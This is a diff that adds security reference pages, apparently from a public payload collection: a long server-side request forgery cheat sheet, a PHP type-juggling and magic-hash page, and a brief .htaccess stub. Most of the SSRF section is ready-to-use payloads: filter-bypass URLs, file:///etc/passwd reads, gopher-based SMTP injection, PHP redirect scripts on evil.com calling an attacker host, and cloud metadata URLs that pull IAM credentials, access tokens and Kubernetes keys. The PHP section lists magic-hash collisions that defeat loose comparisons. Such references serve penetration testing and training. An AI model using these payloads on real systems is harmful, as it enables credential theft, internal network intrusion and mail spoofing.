+2. Launch the SSRF: vulnerable.com/index.php?url=http://YOUR_SERVER_IP
+vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1
+```
+
+Advanced exploit using type=url
+
+```powershell
+Change "type=file" to "type=url"
+Paste URL in text field and hit enter
+Using this vulnerability users can upload images from any image URL = trigger an SSRF
+```
+
+## Bypassing filters
+
+Bypass using HTTPS
+
+```powershell
+https://127.0.0.1/
+https://localhost/
+```
+
+Bypass localhost with [::]
+
+```powershell
+http://[::]:80/
+http://[::]:25/ SMTP
+http://[::]:22/ SSH
+http://[::]:3128/ Squid
+```
+
+```powershell
+http://0000::1:80/
+http://0000::1:25/ SMTP
+http://0000::1:22/ SSH
+http://0000::1:3128/ Squid
+```
+
+Bypass localhost with a domain redirecting to locahost
+
+```powershell
+http://localtest.me
+http://customer1.app.localhost.my.company.127.0.0.1.nip.io
+http://mail.ebc.apple.com redirect to 127.0.0.6 == localhost
+```
+
+The service nip.io is awesome for that, it will convert any ip address as a dns.
+
+```powershell
+NIP.IO maps <anything>.<IP Address>.nip.io to the corresponding <IP Address>, even 127.0.0.1.nip.io maps to 127.0.0.1
+```
+
+Bypass localhost with CIDR : 127.x.x.x
+
+```powershell
+it's a /8
+http://127.127.127.127
+http://127.0.1.3
+http://127.0.0.0
+```
+
+Bypass using a decimal ip location
+
+```powershell
+http://0177.0.0.1/
+http://2130706433/ = http://127.0.0.1
+http://3232235521/ = http://192.168.0.1
+http://3232235777/ = http://192.168.1.1
+```
+
+Bypass using malformed urls
+
+```powershell
+localhost:+11211aaa
+localhost:00011211aaaa
+```
+
+Bypass using rare address
+
+```powershell
+http://0/
+```
+
+Bypass using bash variables (curl only)
+
+```powershell
+curl -v "http://evil$google.com"
+$google = ""
+```
+
+Bypass using tricks combination
+
+```powershell
+http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
+urllib2 : 1.1.1.1
+requests + browsers : 2.2.2.2
+urllib : 3.3.3.3
+```
+
+Bypass using enclosed alphanumerics [@EdOverflow](https://twitter.com/EdOverflow)
+
+```powershell
+http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
+
+List:
+① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
+```
+
+Bypass filter_var() php function
+
+```powershell
+0://evil.com:80;http://google.com:80/ 
+```
+
+Bypass against a weak parser - by Orange Tsai ([Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf))
+
+```powershell
+http://127.1.1.1:80\@127.2.2.2:80/
+http://127.1.1.1:80\@@127.2.2.2:80/
+http://127.1.1.1:80:\@@127.2.2.2:80/
+http://127.1.1.1:80#\@127.2.2.2:80/
+```
+
+![https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/SSRF_Parser.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/WeakParser.jpg)
+
+
+## SSRF exploitation via URL Scheme
+
+File : allows an attacker to fetch the content of a file on the server
+
+```powershell
+file://path/to/file
+file:///etc/passwd
+file://\/\/etc/passwd
+ssrf.php?url=file:///etc/passwd
+```
+
+Http: allows an attacker to fetch any content from the web, it can also be used to scan ports.
+
+```powershell
+ssrf.php?url=http://127.0.0.1:22
+ssrf.php?url=http://127.0.0.1:80
+ssrf.php?url=http://127.0.0.1:443
+```
+
+![SSRF stream](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/SSRF_stream.png)
+
+The following URL scheme can be used to probe the network
+
+Dict : the DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
+
+```powershell
+dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
+ssrf.php?url=dict://attacker:11111/
+```
+
+Sftp : a network protocol used for secure file transfer over secure shell
+
+```powershell
+ssrf.php?url=sftp://evil.com:11111/
+```
+
+Tftp : Trivial File Transfer Protocol, works over UDP
+
+```powershell
+ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
+```
+
+Ldap : Lightweight Directory Access Protocol. It is an application protocol used over an IP network to manage and access the distributed directory information service.
+
+```powershell
+ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
+```
+
+Gopher
+
+```powershell
+ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
+
+will make a request like
+HELO localhost
+MAIL FROM:<hacker@site.com>
+RCPT TO:<victim@site.com>
+DATA
+From: [Hacker] <hacker@site.com>
+To: <victime@site.com>
+Date: Tue, 15 Sep 2017 17:20:26 -0400
+Subject: Ah Ah AH
+
+You didn't say the magic word !
+
+
+.
+QUIT
+```
+
+Gopher SMTP - Back connect to 1337
+
+```php
+Content of evil.com/redirect.php:
+<?php
+header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
+?>
+
+Now query it.
+https://example.com/?q=http://evil.com/redirect.php.
+```
+
+Gopher SMTP - send a mail
+
+```php
+Content of evil.com/redirect.php:
+<?php
+        $commands = array(
+                'HELO victim.com',
+                'MAIL FROM: <admin@victim.com>',
+                'RCPT To: <sxcurity@oou.us>',
+                'DATA',
+                'Subject: @sxcurity!',
+                'Corben was here, woot woot!',
+                '.'
+        );
+
+        $payload = implode('%0A', $commands);
+
+        header('Location: gopher://0:25/_'.$payload);
+?>
+```
+
+## SSRF to XSS by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
+
+```bash
+http://brutelogic.com.br/poc.svg -> simple alert
+https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri= -> simple ssrf
+
+https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg
+```
+
+## SSRF URL for Cloud Instances
+
+### SSRF URL for AWS Bucket
+
+[Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)
+Interesting path to look for at `http://169.254.169.254`
+
+```powershell
+Always here : /latest/meta-data/{hostname,public-ipv4,...}
+User data (startup script for auto-scaling) : /latest/user-data
+Temporary AWS credentials : /latest/meta-data/iam/security-credentials/
+```
+
+DNS record
+
+```powershell
+http://169.254.169.254
+http://metadata.nicob.net/
+http://169.254.169.254.xip.io/
+http://1ynrnhl.xip.io/
+http://www.owasp.org.1ynrnhl.xip.io/
+```
+
+HTTP redirect
+
+```powershell
+Static:http://nicob.net/redir6a
+Dynamic:http://nicob.net/redir-http-169.254.169.254:80-
+```
+
+Alternate IP encoding
+
+```powershell
+http://425.510.425.510/ Dotted decimal with overflow
+http://2852039166/ Dotless decimal
+http://7147006462/ Dotless decimal with overflow
+http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal
+http://0xA9FEA9FE/ Dotless hexadecimal
+http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow
+http://0251.0376.0251.0376/ Dotted octal
+http://0251.00376.000251.0000376/ Dotted octal with padding
+```
+
+More urls to include
+
+```powershell
+http://169.254.169.254/latest/user-data
+http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
+http://169.254.169.254/latest/meta-data/
+http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
+http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
+http://169.254.169.254/latest/meta-data/ami-id
+http://169.254.169.254/latest/meta-data/reservation-id
+http://169.254.169.254/latest/meta-data/hostname
+http://169.254.169.254/latest/meta-data/public-keys/
+http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
+http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
+http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
+```
+
+E.g: Jira SSRF leading to AWS info disclosure - `https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/metadata/v1/maintenance`
+
+E.g2: Flaws challenge - `http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/`
+
+### SSRF URL for Google Cloud
+
+Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True"
+
+```powershell
+http://169.254.169.254/computeMetadata/v1/
+http://metadata.google.internal/computeMetadata/v1/
+http://metadata/computeMetadata/v1/
+http://metadata.google.internal/computeMetadata/v1/instance/hostname
+http://metadata.google.internal/computeMetadata/v1/instance/id
+http://metadata.google.internal/computeMetadata/v1/project/project-id
+```
+
+Google allows recursive pulls
+
+```powershell
+http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true
+```
+
+Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn)
+
+```powershell
+http://metadata.google.internal/computeMetadata/v1beta1/
+http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
+```
+
+Interesting files to pull out:
+
+- SSH Public Key : `http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json`
+- Get Access Token : `http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token`
+- Kubernetes Key : `http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json`
+
+### SSRF URL for Digital Ocean
+
+Documentation available at `https://developers.digitalocean.com/documentation/metadata/`
+
+```powershell
+curl http://169.254.169.254/metadata/v1/id
+http://169.254.169.254/metadata/v1.json
+http://169.254.169.254/metadata/v1/ 
+http://169.254.169.254/metadata/v1/id
+http://169.254.169.254/metadata/v1/user-data
+http://169.254.169.254/metadata/v1/hostname
+http://169.254.169.254/metadata/v1/region
+http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address
+
+All in one request:
+curl http://169.254.169.254/metadata/v1.json | jq
+```
+
+### SSRF URL for Packetcloud
+
+Documentation available at `https://metadata.packet.net/userdata`
+
+### SSRF URL for Azure
+
+Limited, maybe more exists? `https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/`
+
+```powershell
+http://169.254.169.254/metadata/v1/maintenance
+```
+
+Update Apr 2017, Azure has more support; requires the header "Metadata: true" `https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service`
+
+```powershell
+http://169.254.169.254/metadata/instance?api-version=2017-04-02
+http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
+```
+
+### SSRF URL for OpenStack/RackSpace
+
+(header required? unknown)
+
+```powershell
+http://169.254.169.254/openstack
+```
+
+### SSRF URL for HP Helion
+
+(header required? unknown)
+
+```powershell
+http://169.254.169.254/2009-04-04/meta-data/ 
+```
+
+### SSRF URL for Oracle Cloud
+
+```powershell
+http://192.0.0.192/latest/
+http://192.0.0.192/latest/user-data/
+http://192.0.0.192/latest/meta-data/
+http://192.0.0.192/latest/attributes/
+```
+
+### SSRF URL for Alibaba
+
+```powershell
+http://100.100.100.200/latest/meta-data/
+http://100.100.100.200/latest/meta-data/instance-id
+http://100.100.100.200/latest/meta-data/image-id
+```
+
+### SSRF URL for Kubernetes ETCD
+
+Can contain API keys and internal ip and ports
+
+```powershell
+curl -L http://127.0.0.1:2379/version
+curl http://127.0.0.1:2379/v2/keys/?recursive=true
+```
+
+### SSRF URL for Docker
+
+```powershell
+http://127.0.0.1:2375/v1.24/containers/json
+
+Simple example
+docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash
+bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
+bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
+```
+
+### SSRF URL for Rancher
+
+```powershell
+curl http://rancher-metadata/<version>/<path>
+```
+
+More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-service/
+
+
+## References
+
+- [Extracting AWS metadata via SSRF in Google Acquisition - tghawkins - 2017-12-13](https://hawkinsecurity.com/2017/12/13/extracting-aws-metadata-via-ssrf-in-google-acquisition/)
+- [ESEA Server-Side Request Forgery and Querying AWS Meta Data](http://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/) by Brett Buerhaus
+- [SSRF and local file read in video to gif converter](https://hackerone.com/reports/115857)
+- [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748)
+- [SSRF in proxy.duckduckgo.com](https://hackerone.com/reports/358119)
+- [Blind SSRF on errors.hackerone.net](https://hackerone.com/reports/374737)
+- [SSRF on *shopifycloud.com](https://hackerone.com/reports/382612)
+- [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
+- [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648)
+- [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
+- [#HITBGSEC 2017 SG Conf D1 - A New Era Of SSRF - Exploiting Url Parsers - Orange Tsai](https://www.youtube.com/watch?v=D1S-G8rJrEk)
+- [SSRF Tips - xl7dev](http://blog.safebuff.com/2016/07/03/SSRF-Tips/)
+- [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748)
+- [Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat](https://www.dailysecurity.fr/server-side-request-forgery/)
+- [AppSecEU15 Server side browsing considered harmful - @Agarri](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)
+- [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow)
+- [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity](http://www.sxcurity.pro/2017/12/17/hackertarget/)
+- [PHP SSRF @secjuice](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51)
+- [How I convert SSRF to xss in a ssrf vulnerable Jira](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
+- [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a)
+- [Hacker101 SSRF](https://www.youtube.com/watch?v=66ni2BTIjS8)
+- [SSRF脆弱性を利用したGCE/GKEインスタンスへの攻撃例](https://blog.ssrf.in/post/example-of-attack-on-gce-and-gke-instance-using-ssrf-vulnerability/)
+- [SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1 - SaN ThosH - 10 Jan 2019](https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978)
--- a/juggling/README.md
+++ b/juggling/README.md
@ -0,0 +1,62 @@
+# PHP Juggling type and magic hashes
+
+PHP provides two ways to compare two variables:
+
+- Loose comparison using `== or !=` : both variables have "the same value".
+- Strict comparison using `=== or !==` : both variables have "the same type and the same value".
+
+## Type Juggling
+
+### True statements
+
+```php
+var_dump('0010e2'   == '1e3');           # true
+var_dump('0xABCdef' == ' 0xABCdef');     # true PHP 5.0 / false PHP 7.0
+var_dump('0xABCdef' == '     0xABCdef'); # true PHP 5.0 / false PHP 7.0
+var_dump('0x01'     == 1)                # true PHP 5.0 / false PHP 7.0
+var_dump('0x1234Ab' == '1193131');
+```
+
+```php
+'123'  == 123
+'123a' == 123
+'abc'  == 0
+```
+
+```php
+'' == 0 == false == NULL
+'' == 0       # true
+0  == false   # true
+false == NULL # true
+NULL == ''    # true
+```
+
+### NULL statements
+
+```php
+var_dump(sha1([])); # NULL
+var_dump(md5([]));  # NULL
+```
+
+## Magic Hashes - Exploit
+
+If the hash computed starts with "0e" (or "0..0e") only followed by numbers, PHP will treat the hash as a float.
+
+| Hash | “Magic” Number / String    | Magic Hash                                    | Found By      |
+| ---- | -------------------------- |:---------------------------------------------:| -------------:|
+| MD5  | 240610708                  | 0e462097431906509019562988736854              | Michal Spacek |
+| SHA1 | 10932435112                | 0e07766915004133176347055865026311692244      | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham |
+
+```php
+<?php
+var_dump(md5('240610708') == md5('QNKCDZO')); # bool(true)
+var_dump(md5('aabg7XSs')  == md5('aabC9RqS'));
+var_dump(sha1('aaroZmOk') == sha1('aaK1STfY'));
+var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));
+?>
+```
+
+## References
+
+* [Writing Exploits For Exotic Bug Classes: PHP Type Juggling By Tyler Borland](http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html)
+* [Magic Hashes - WhieHatSec](https://www.whitehatsec.com/blog/magic-hashes/)
--- a/files/README.md
+++ b/files/README.md
@ -59,6 +59,10 @@ IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e
 IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
 ```

+### .htaccess
+
+An .htaccess file is a way to configure the details of your website without needed to alter the server config files. 
+
 ## References

 * Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil